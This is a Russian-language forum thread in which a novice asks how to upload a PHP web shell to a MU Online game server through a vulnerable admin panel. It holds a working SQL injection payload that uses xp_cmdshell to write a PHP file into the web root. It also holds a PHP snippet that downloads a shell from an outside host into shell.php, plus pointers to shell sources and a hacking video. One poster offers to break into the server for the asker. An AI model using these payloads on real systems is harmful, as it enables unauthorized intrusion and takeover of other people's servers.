Всем привет, я новичок в этом деле на счет шеллов и никак немгу понять как мне прописать чтобы залить шелл, я захожу в админку там есть уязвимость через которую и можно прописать шелл, ну вот вопрос состоит как прописать ссылку например www.ссылка_на_шелл/c99.php
Получается только залить phpinfo
; USE Master exec xp_cmdshell 'echo "<?php phpinfo(); ?>" > C:\AppServ\www\shell.php';--
Ссылку вписываю так
http://pic.ipicture.ru/uploads/090612/Pd0bq7RGih.jpg

Я вот сам немогу сообразить какб ы это обьянсить поподробней:((
Ну я хочу через CMD залить шелл

Что то не то...3 раза перечитывал

Через cmd нельзя никак (так как у тебя вроде нету доступа к нему на сколько я понял)
Поищи в гугле "Мини шелл" (там все таки не полный шелл но можно что то сделать)
А вообще надо смотреть какая у тя ситуация так будет лучше понимание людей (понимание проблемы)

Через cmd нельзя никак (так как у тебя вроде нету доступа к нему на сколько я понял)
Поищи в гугле "Мини шелл" (там все таки не полный шелл но можно что то сделать)
А вообще надо смотреть какая у тя ситуация так будет лучше понимание людей (понимание проблемы)
Ну через CMD получается же сделать PHPINFO
http://pic.ipicture.ru/uploads/090612/UStrycXtow.jpg

<?php
copy('http://yazzz.com/shell.txt','shell.php');
?>

Вот код
Вместо www.yazzz.com/shell.txt пишешь путь до шелла который ты сам залил на какой нибуть хост, так как дальше его содержимое будет копироваться в файл shell.php (главное чтобы файл shell.php существовал уже в каталоге!)(шелл можно достать на madnet.name)
Главное чтобы было с http вначале иначе код наврятли сработает

Пробуй вообщем в правильности кода я не уверен

ничего неполучается:((((((((

Щас попробуй!
Я там просто обновлял пост (ошибки были)
А лучше напиши как сначала будешь делать и что писать чтобы я смог проверить все ли правильно!
Работать должно так как протестил на локалке

При вводе этого у меня Fatal error: Call to a member function fetchrow() on a non-object in C:\AppServ\www\administrator\editcharacter.php on line 12

Скинь уязвимость в ПМ (если через акк уязв. то с акком) попробую залить шелл. как залью расскажу что и как я делал

Напиши в аську плиз
384-586-512

muonline gamer detected
Народ, тут всё просто =\
Все мушки (muonline серверы) ставят школьники по инструкции, смотрят видео и посторяют, чато даже phpmyadmin не удаляют
Точно также их ломают такиеже школьники, также по инструкции, тупо повторяют что видят в видео, ТС какраз пример этого

Мне даже кажеться это я эту дырку в паблик выложил, ибо я юзаю use master exec xp_cmdshell вместо exec master..xp_cmdshell, но не уверен, ТС, покажи де видео нащёл

понч он твоего видео все это сделал. мне он сам сказал.

Тему можно закрывать, ибо как вы ему скажите так он и повторит =\

Ponchik detected , мего хакер muonline, да я юзнул твой видос, ты так говришь о школьниках как будто ты с самого рождение все сразу знал...всему надо учится, подсказал бы что либо...

Scetcher, скинь в ПМ либо в аську 674542

Scetcher, твоя проблема в том что ты хочеш хекать хекать хекать, но ты без понятия как это работает всё =\
Выучи PHP, MySQL напиши пару сайтов, и знания о хеке появятся сами собой
Хек это побочный эффект так сказать, его низя познать незная как оно всё работает
Пойди книги по программированию почитай, ну неделя у тя уйдёт чтоб книгу прочитать, зато всё поймёш и небудеш мозг насиловать нам

Ponchik , ну вот тут хотябы какойто уже совет дал:))

Ponchik, ну всетаки может подскажешь как это сделать?:)

muonline gamer detected
Народ, тут всё просто =\
Все мушки (muonline серверы) ставят школьники по инструкции, смотрят видео и посторяют, чато даже phpmyadmin не удаляют
Точно также их ломают такиеже школьники, также по инструкции, тупо повторяют что видят в видео, ТС какраз пример этого

Мне даже кажеться это я эту дырку в паблик выложил, ибо я юзаю use master exec xp_cmdshell вместо exec master..xp_cmdshell, но не уверен, ТС, покажи де видео нащёл


А что за видео? о_0

Что-бы что-то ломать,нужно что-то построить! (с)

Ponchik , ну вот тут хотябы какойто уже совет дал:))
Как хорошо, онотоле одобряе?
За ум берись ***!

Как хорошо, онотоле одобряе?
За ум берись ***!
Одобряэ!

Как хорошо, онотоле одобряе?
За ум берись ***!
:D :D :D :D :D :D

Ponchik, что за видео-то? о_0
Я что-то пропустил) ?

Ponchik, что за видео-то? о_0
Я что-то пропустил) ?
Видео старое уже...как он MuWeb хакал
СКАЧАЙ =) (http://www.sharemania.ru/0226098)